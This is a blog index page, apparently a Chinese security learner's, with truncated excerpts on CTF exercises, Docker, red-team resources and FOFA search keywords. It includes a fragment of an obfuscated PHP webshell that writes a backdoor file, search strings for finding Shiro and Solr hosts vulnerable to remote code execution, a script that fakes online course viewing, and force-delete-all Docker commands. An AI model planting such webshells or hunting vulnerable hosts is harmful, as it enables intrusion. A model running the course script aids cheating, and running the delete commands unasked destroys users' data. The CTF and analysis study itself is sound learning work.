会员
周边
新闻
博问
闪存
众包
赞助商
Chat2DB
所有博客
当前博客
我的博客
我的园子
账号设置
会员中心
简洁模式
...
退出登录
注册
登录
天钧
博客园
首页
新随笔
联系
订阅
管理
2020年11月22日
批量注入打法
摘要: 来自为知笔记(Wiz)
阅读全文
posted @ 2020-11-22 23:19 天钧
阅读(104)
评论(0)
推荐(0)
2020年11月15日
WebShell代码分析溯源(第11题)
摘要: 文件下载下来后这样的<?php <!--more-->if(!empty($_GET[1]) && $_GET[1]=='GET.fPZ87'){$_=@fopen('t.php', 'a');@fwrite($_,"<?php \$_=str_replace('ilo','ass',str_rep
阅读全文
posted @ 2020-11-15 15:41 天钧
阅读(118)
评论(0)
推荐(0)
墨者学院-php分析溯源
摘要: 源码下载后发现是<!--more-->md5加密 源码下载后 发现是 md5加密 md5加密 来自为知笔记(Wiz)
阅读全文
posted @ 2020-11-15 15:23 天钧
阅读(103)
评论(0)
推荐(0)
2020年11月14日
hack101 CTF 做题记录
摘要: 第一题右键源代码查看,发现了个东东<!--more-->访问之提交下一题简单的看了下,只有一个留言版 右键源代码查看,发现了个东东 访问之 访问之 提交 提交 下一题 下一题 简单的看了下,只有一个留言版 在Markdown Test编写的内容会在testing中显示,那么就很简单了,尝试构造xss
阅读全文
posted @ 2020-11-14 21:18 天钧
阅读(280)
评论(0)
推荐(0)
2020年11月11日
红队和蓝队资料集锦
摘要: 项目简介一个 Red Team 攻击的生命周期,整个生命周期包括:信息收集、攻击尝试获得权限、持久性控制、权限提升、网络信息收集、横向移动、数据分析(在这个基础上再做持久化控制)、在所有攻击结束之后清理并退出战场。和一个著名的蓝队项目:https://github.com/meitar/awesom
阅读全文
posted @ 2020-11-11 19:56 天钧
阅读(1067)
评论(0)
推荐(2)
docker 删除所有容器和镜像的命令
摘要: 1、杀死运行的容器: # docker kill $(docker ps -a -q)2、删除所有容器:# docker rm $(docker ps -a -q)3、强制删除所有镜像:# docker rmi -f $(docker images -q) 1、杀死运行的容器: # docker k
阅读全文
posted @ 2020-11-11 14:15 天钧
阅读(1057)
评论(0)
推荐(0)
docker的快速学习
摘要: 最近不停的在搭建一些线上的工具与扫描器,其中用到最多的就是docker,感同身受的,所以今天群友也刚好需求这方面的文章。我也就快速学习下docker 大佬勿喷,小弟正在努力追赶中。 我使用的系统是Linux(上次快速学习linux剩下的),个人推荐用contos系统,虽然有一台,但是是我上课专用的,
阅读全文
posted @ 2020-11-11 12:57 天钧
阅读(113)
评论(0)
推荐(0)
2020年11月8日
智慧树刷课
摘要: document.querySelector('.volumeIcon').click();//静音处理 document.getElementsByClassName('speedTab15')[0].click();//1.5倍速播放 setInterval(function(){//每3秒执行
阅读全文
posted @ 2020-11-08 17:04 天钧
阅读(495)
评论(0)
推荐(0)
2020年11月7日
基础入门-环境准备 (第一天)
摘要: vmware : win2003 2008 7 2012 Linux kali Ubuntu等 运行环境:JDK(burp),python(3.x sqlmap ) web环境 : phpstudy ,IIS 6 7 8 docker ,jspstudy等 快捷软件: notepad++ every
阅读全文
posted @ 2020-11-07 16:59 天钧
阅读(107)
评论(0)
推荐(0)
2020年11月5日
我常用的FOFA关键词
摘要: header=“rememberme=deleteMe”、header=“shiroCookie” # CVE-2019-17558 Apache Solr Velocity模板远程代码执行app="Apache-Shiro"# 搜索湖北地区的资产<!--more--> && region="Hub
阅读全文
posted @ 2020-11-05 18:25 天钧
阅读(517)
评论(0)
推荐(0)
下一页
公告